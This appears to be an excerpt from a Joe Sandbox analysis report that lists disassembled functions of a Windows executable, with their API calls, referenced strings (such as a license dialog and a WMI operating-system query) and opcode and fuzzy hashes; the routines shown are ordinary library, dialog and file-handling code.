Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: InfoQuerySystemVirtual
String ID: D
API String ID: 401686933-2746444292
Opcode ID: ff092e56c8372e88c93683ae2f97b479ad5bd3b0424adfe622a80b601be4d696
Instruction ID: 4f67f9524b09979aa25bfdc76ac6db6b02e4f79e72e9e4ea8ca5de5a0ce9784c
Opcode Fuzzy Hash: ff092e56c8372e88c93683ae2f97b479ad5bd3b0424adfe622a80b601be4d696
Instruction Fuzzy Hash: 2801F73260024D6BDB18DE29DC09BED7BEAAFC4324F0CC120EE59D7154D734D9458680

Uniqueness

Uniqueness Score: -1.00%

Function 000FAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 000FAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,0011E72C,?,?), ref: 000FAF84

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 046b28e8f02b10c7ad8134f6902af52bd8eacb2a0f88bc59ca7afe97aa82bbcd
Instruction ID: 941f39d1b3745245a50b2c9058b1af65359373e623b033ee895573cb70249f9e
Opcode Fuzzy Hash: 046b28e8f02b10c7ad8134f6902af52bd8eacb2a0f88bc59ca7afe97aa82bbcd
Instruction Fuzzy Hash: 7A01BC7A54030CBAD7108FA0ED05FDA77FCEF08310F009022FA04A71A0E370A955CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 000EB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 000EB16B

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: cddf62681f6fe962e7c590eea553fb38ad10be196d3b8a603fee100891023056
Instruction ID: a56521f52de9fca5ec957e92301b9f582177b157dc0952c9899e684f3b42fb23
Opcode Fuzzy Hash: cddf62681f6fe962e7c590eea553fb38ad10be196d3b8a603fee100891023056
Instruction Fuzzy Hash: F4F054B5E00248AFDB28CB18ED916DA73F1F798315F1043A5EA15A3790C370ADC1CE64

Uniqueness

Uniqueness Score: -1.00%

Function 000EE2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 000EE30E

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

Part of subcall function 000F1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00121030,?,000ED928,00000000,?,00000050,00121030), ref: 000F1DC4

_strlen.LIBCMT ref: 000EE32F
SetDlgItemTextW.USER32(?,0011E274,?), ref: 000EE38F
GetWindowRect.USER32(?,?), ref: 000EE3C9
GetClientRect.USER32(?,?), ref: 000EE3D5
GetWindowLongW.USER32(?,000000F0), ref: 000EE475
GetWindowRect.USER32(?,?), ref: 000EE4A2
SetWindowTextW.USER32(?,?), ref: 000EE4DB
GetSystemMetrics.USER32(00000008), ref: 000EE4E3
GetWindow.USER32(?,00000005), ref: 000EE4EE
GetWindowRect.USER32(00000000,?), ref: 000EE51B
GetWindow.USER32(00000000,00000002), ref: 000EE58D

Strings

$%s:, xrefs: 000EE302
CAPTION, xrefs: 000EE4BD
d, xrefs: 000EE3F5

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
String ID: $%s:$CAPTION$d
API String ID: 2407758923-2512411981
Opcode ID: 7af5dafbc4aa6a11d3f7197982c21cdbbda5e22483d18a30b3392ddc2375a59e
Instruction ID: 82ef8b7d3f8936985cd8909dc6f5a73cde51302dedfe8b2a0765d9b53185fe2e
Opcode Fuzzy Hash: 7af5dafbc4aa6a11d3f7197982c21cdbbda5e22483d18a30b3392ddc2375a59e
Instruction Fuzzy Hash: 9481D372104385AFD710DF69CD88A6FBBE9EBC9704F04092DFA94E3291D771E9058B52

Uniqueness

Uniqueness Score: -1.00%

Function 0010CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0010CB66

Part of subcall function 0010C701: _free.LIBCMT ref: 0010C71E
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C730
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C742
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C754
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C766
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C778
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C78A
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C79C
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7AE
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7C0
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7D2
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7E4
Part of subcall function 0010C701: _free.LIBCMT ref: 0010C7F6

_free.LIBCMT ref: 0010CB5B

Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4

_free.LIBCMT ref: 0010CB7D
_free.LIBCMT ref: 0010CB92
_free.LIBCMT ref: 0010CB9D
_free.LIBCMT ref: 0010CBBF
_free.LIBCMT ref: 0010CBD2
_free.LIBCMT ref: 0010CBE0
_free.LIBCMT ref: 0010CBEB
_free.LIBCMT ref: 0010CC23
_free.LIBCMT ref: 0010CC2A
_free.LIBCMT ref: 0010CC47
_free.LIBCMT ref: 0010CC5F

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 697ca6c05bc447180c7283dc97604aa22689a45d2ae46d4a212b8d7f395e8bc9
Instruction ID: b7368613a0066d56f360bff29889aa314efef7706778550b8812a1343a39d653
Opcode Fuzzy Hash: 697ca6c05bc447180c7283dc97604aa22689a45d2ae46d4a212b8d7f395e8bc9
Instruction Fuzzy Hash: 71314F3160420A9FEB21AB78D946B5AB7E9AF20350F144629E5CDD71D1DFB1AC80CF50

Uniqueness

Uniqueness Score: -1.00%

Function 000FD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 000FD6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 000FD6ED

Part of subcall function 000F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000EC116,00000000,.exe,?,?,00000800,?,?,?,000F8E3C), ref: 000F1FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 000FD709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 000FD720
GetObjectW.GDI32(00000000,00000018,?), ref: 000FD734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 000FD75D
DeleteObject.GDI32(00000000), ref: 000FD764
GetWindow.USER32(00000000,00000002), ref: 000FD76D

Strings

STATIC, xrefs: 000FD6F3

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: f4a4c282078820cfd4807fcb9e3d7741d1be4bc914bc7bffd14bd7ac3498d174
Instruction ID: b81ec1cccb47e50c99ea6baf9df01663e467c820fdfa48cf2a34662adf7896e0
Opcode Fuzzy Hash: f4a4c282078820cfd4807fcb9e3d7741d1be4bc914bc7bffd14bd7ac3498d174
Instruction Fuzzy Hash: D61127762047187BE2217B709C4AFFF769DAF42B11F004121FB11A68A2EA64CA4562A1

Uniqueness

Uniqueness Score: -1.00%

Function 001096F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00109705

Part of subcall function 00108DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?), ref: 00108DE2
Part of subcall function 00108DCC: GetLastError.KERNEL32(?,?,0010C896,?,00000000,?,00000000,?,0010C8BD,?,00000007,?,?,0010CCBA,?,?), ref: 00108DF4

_free.LIBCMT ref: 00109711
_free.LIBCMT ref: 0010971C
_free.LIBCMT ref: 00109727
_free.LIBCMT ref: 00109732
_free.LIBCMT ref: 0010973D
_free.LIBCMT ref: 00109748
_free.LIBCMT ref: 00109753
_free.LIBCMT ref: 0010975E
_free.LIBCMT ref: 0010976C

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9144e5c033c4802141ede2f9db1d712a2b1c1ad20efe773b8cf007d19f5f788f
Instruction ID: 927d7c803db5ee1b09e0d0aeb633559f5ae99957028873ea29a51cf35ff25974
Opcode Fuzzy Hash: 9144e5c033c4802141ede2f9db1d712a2b1c1ad20efe773b8cf007d19f5f788f
Instruction Fuzzy Hash: AE11A77612410EAFCB01EF94C942CD93B75EF24350B5155A1FA884F1A2DFB2DA509B84

Uniqueness

Uniqueness Score: -1.00%

Function 00102E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00102F50
___TypeMatch.LIBVCRUNTIME ref: 0010305E
_UnwindNestedFrames.LIBCMT ref: 001031B0
CallUnexpected.LIBVCRUNTIME ref: 001031CB
_abort.LIBCMT ref: 001031D0

Strings

csm, xrefs: 00102E6E
csm, xrefs: 00102F87
csm, xrefs: 00102EDB

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: a704afe13dbfb40299cd37add8b5d7261f43d1a6df2801bd1ac7517953b4daf5
Instruction ID: a28c824e747fce87116a133be6b003af9a0955e94e8123b7340b9c0cfe70074a
Opcode Fuzzy Hash: a704afe13dbfb40299cd37add8b5d7261f43d1a6df2801bd1ac7517953b4daf5
Instruction Fuzzy Hash: 49B1AF71900209DFCF29DFA4C8859AEB7B9FF18310F14415AF8A56B292C7B1DA52CB91

Uniqueness

Uniqueness Score: -1.00%

Function 000E6FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E6FAA
_wcslen.LIBCMT ref: 000E7013
_wcslen.LIBCMT ref: 000E7084

Part of subcall function 000E7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 000E7AAB
Part of subcall function 000E7A9C: GetLastError.KERNEL32 ref: 000E7AF1
Part of subcall function 000E7A9C: CloseHandle.KERNEL32(?), ref: 000E7B00

Strings

SeRestorePrivilege, xrefs: 000E6FC2
UNC\, xrefs: 000E7051
\??\, xrefs: 000E702B
SeCreateSymbolicLinkPrivilege, xrefs: 000E6FCC

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 0aebaeabe86412607879a154e9aad9042da57b0cc67f13978722a60d17462a8d
Instruction ID: dd5adcf63f1fb540170f0b3f461fe87341bb6ccef383cc5e4acb31844ce9e843
Opcode Fuzzy Hash: 0aebaeabe86412607879a154e9aad9042da57b0cc67f13978722a60d17462a8d
Instruction Fuzzy Hash: 2E41B1B1D083C4BEEB30E7759D82FEE77AC9F58344F004455FA59B6183D774AA888621

Uniqueness

Uniqueness Score: -1.00%

Function 000F9711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 000F9736
_wcslen.LIBCMT ref: 000F97D6
GlobalAlloc.KERNEL32(00000040,?), ref: 000F97E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 000F9806

Strings

<html>, xrefs: 000F9755, 000F978E
</html>, xrefs: 000F97B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 000F9760
utf-8"></head>, xrefs: 000F976B

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: 7b0f2c2388aebcbf1a981197a912d066c78f2a607e0332c813f68406a5a076ba
Instruction ID: 0d3af84a571d1218d95e59259aba55e803ef104058e62a87dbfd05ab923e63ed
Opcode Fuzzy Hash: 7b0f2c2388aebcbf1a981197a912d066c78f2a607e0332c813f68406a5a076ba
Instruction Fuzzy Hash: 3F3168325083057BE729AF30DC06FBF779C9F52720F14021DF611965D2EBA49A4583A5

Uniqueness

Uniqueness Score: -1.00%

Function 000FB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370

EndDialog.USER32(?,00000001), ref: 000FB610
SendMessageW.USER32(?,00000080,00000001,?), ref: 000FB637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 000FB650
SetWindowTextW.USER32(?,?), ref: 000FB661
GetDlgItem.USER32(?,00000065), ref: 000FB66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 000FB67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 000FB694

Strings

LICENSEDLG, xrefs: 000FB5D4

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 455607bc931c8836b0f4982994662501b2f13cdad68b9371fbc0f9431f78541d
Instruction ID: 8aac429ca41ad58967b8074c462a756f59b2cffa81044a439eb77a6e8d8149c5
Opcode Fuzzy Hash: 455607bc931c8836b0f4982994662501b2f13cdad68b9371fbc0f9431f78541d
Instruction Fuzzy Hash: 4821C931644209BBD2215F75ED49F7B3BADEB4BB41F010014F704D6CF1CB569981AA35

Uniqueness

Uniqueness Score: -1.00%

Function 000FFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,37C5CE4C,00000001,00000000,00000000,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFE14
SysAllocString.OLEAUT32(00000000), ref: 000FFE1F
_com_issue_error.COMSUPP ref: 000FFE48
_com_issue_error.COMSUPP ref: 000FFE52
GetLastError.KERNEL32(80070057,37C5CE4C,00000001,00000000,00000000,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFE57
_com_issue_error.COMSUPP ref: 000FFE6A
GetLastError.KERNEL32(00000000,?,?,000EAF6C,ROOT\CIMV2), ref: 000FFE80
_com_issue_error.COMSUPP ref: 000FFE93

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: e39526699e00b23eb14e4cb4f30cf1bc21b95fe5c2bf82dbd2581def69227268
Instruction ID: b0a15b137479d29289eb3eb14b17fc378d95a079f7a6eb274163ae447cc309b1
Opcode Fuzzy Hash: e39526699e00b23eb14e4cb4f30cf1bc21b95fe5c2bf82dbd2581def69227268
Instruction Fuzzy Hash: 3241F571A0021EABCB10DF64C845BFEBBE9EF48710F10823AFA15E7A91D774994097E4

Uniqueness

Uniqueness Score: -1.00%

Function 000EAF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000EAF29

Strings

SELECT * FROM Win32_OperatingSystem, xrefs: 000EAFCA
Windows 10, xrefs: 000EB0C2
Name, xrefs: 000EB0B0
ROOT\CIMV2, xrefs: 000EAF5C
WQL, xrefs: 000EAFDC

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 1472796a2bdad332e220c407af910d7f02337ff64b4c4f9fb73c59008eb753b8
Instruction ID: 4beacac246e3f0b682ea46a1e09d9a53c55666ccc5af2a599b30fba49abba173
Opcode Fuzzy Hash: 1472796a2bdad332e220c407af910d7f02337ff64b4c4f9fb73c59008eb753b8
Instruction Fuzzy Hash: 33717C70B00659AFDB18DFA5CC959AFBBB9FF49310B14416DE512B72A0CB30AD41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 000E9382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 000E9387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 000E93AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 000E93C9

Part of subcall function 000EC29A: _wcslen.LIBCMT ref: 000EC2A2

Part of subcall function 000F1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,000EC116,00000000,.exe,?,?,00000800,?,?,?,000F8E3C), ref: 000F1FD1

_swprintf.LIBCMT ref: 000E9465

Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5

MoveFileW.KERNEL32(?,?), ref: 000E94D4
MoveFileW.KERNEL32(?,?), ref: 000E9514

Strings

rtmp%d, xrefs: 000E944E

Memory Dump Source

Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_e0000_s.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: e26573ea50d8bb8cf6ece17622feb726b1188504e100ce485d06f512628076b2
Instruction ID: f2c4fc3d356866669f170149306693de81e8c06771cbba34bc5137ffd6677f26
Opcode Fuzzy Hash: e26573ea50d8bb8cf6ece17622feb726b1188504e100ce485d06f512628076b2
